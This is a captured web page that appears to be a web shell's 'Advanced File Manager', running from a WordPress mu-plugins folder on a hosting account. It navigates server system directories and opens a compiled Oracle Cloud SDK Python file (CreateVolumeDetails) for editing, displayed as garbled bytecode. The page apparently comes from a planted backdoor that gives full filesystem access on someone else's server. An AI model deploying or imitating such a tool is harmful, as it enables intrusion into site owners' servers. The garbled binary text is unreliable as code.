📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
core
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/core/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: create_volume_details.pyc
a N��fAN � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdd� Zedd� �Zejdd� �Zedd� �Zejd d� �Zed d� �Z e jdd� �Z ed d� �Z e jdd� �Z edd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Z e jdd� �Z edd� �Zejdd� �Zedd� �Zejdd� �Zedd � �Zejd!d � �Zed"d#� �Zejd$d#� �Zed%d&� �Zejd'd&� �Zed(d)� �Zejd*d)� �Zed+d,� �Zejd-d,� �Zed.d/� �Zejd0d/� �Zd1d2� Zd3d4� Zd5d6� Zd7S )8�CreateVolumeDetailsz� The details of the volume to create. For CreateVolume operation, this field is required in the request, see :func:`create_volume`. c K s� dddddddddddddddd �| _ d ddd dddddddddddd �| _d| _d| _d| _d| _d| _d| _d| _d| _ d| _ d| _d| _d| _ d| _d| _d| _dS )a� Initializes a new CreateVolumeDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param availability_domain: The value to assign to the availability_domain property of this CreateVolumeDetails. :type availability_domain: str :param backup_policy_id: The value to assign to the backup_policy_id property of this CreateVolumeDetails. :type backup_policy_id: str :param compartment_id: The value to assign to the compartment_id property of this CreateVolumeDetails. :type compartment_id: str :param defined_tags: The value to assign to the defined_tags property of this CreateVolumeDetails. :type defined_tags: dict(str, dict(str, object)) :param display_name: The value to assign to the display_name property of this CreateVolumeDetails. :type display_name: str :param freeform_tags: The value to assign to the freeform_tags property of this CreateVolumeDetails. :type freeform_tags: dict(str, str) :param kms_key_id: The value to assign to the kms_key_id property of this CreateVolumeDetails. :type kms_key_id: str :param vpus_per_gb: The value to assign to the vpus_per_gb property of this CreateVolumeDetails. :type vpus_per_gb: int :param size_in_gbs: The value to assign to the size_in_gbs property of this CreateVolumeDetails. :type size_in_gbs: int :param size_in_mbs: The value to assign to the size_in_mbs property of this CreateVolumeDetails. :type size_in_mbs: int :param source_details: The value to assign to the source_details property of this CreateVolumeDetails. :type source_details: oci.core.models.VolumeSourceDetails :param volume_backup_id: The value to assign to the volume_backup_id property of this CreateVolumeDetails. :type volume_backup_id: str :param is_auto_tune_enabled: The value to assign to the is_auto_tune_enabled property of this CreateVolumeDetails. :type is_auto_tune_enabled: bool :param block_volume_replicas: The value to assign to the block_volume_replicas property of this CreateVolumeDetails. :type block_volume_replicas: list[oci.core.models.BlockVolumeReplicaDetails] :param autotune_policies: The value to assign to the autotune_policies property of this CreateVolumeDetails. :type autotune_policies: list[oci.core.models.AutotunePolicy] �strzdict(str, dict(str, object))zdict(str, str)�int�VolumeSourceDetails�boolzlist[BlockVolumeReplicaDetails]zlist[AutotunePolicy])�availability_domain�backup_policy_id�compartment_id�defined_tags�display_name� freeform_tags� kms_key_id�vpus_per_gb�size_in_gbs�size_in_mbs�source_details�volume_backup_id�is_auto_tune_enabled�block_volume_replicas�autotune_policies�availabilityDomain�backupPolicyId� compartmentId�definedTags�displayName�freeformTags�kmsKeyId� vpusPerGB� sizeInGBs� sizeInMBs� sourceDetails�volumeBackupId�isAutoTuneEnabled�blockVolumeReplicas�autotunePoliciesN)� swagger_types� attribute_map�_availability_domain�_backup_policy_id�_compartment_id� _defined_tags� _display_name�_freeform_tags�_kms_key_id�_vpus_per_gb�_size_in_gbs�_size_in_mbs�_source_details�_volume_backup_id�_is_auto_tune_enabled�_block_volume_replicas�_autotune_policies)�self�kwargs� r<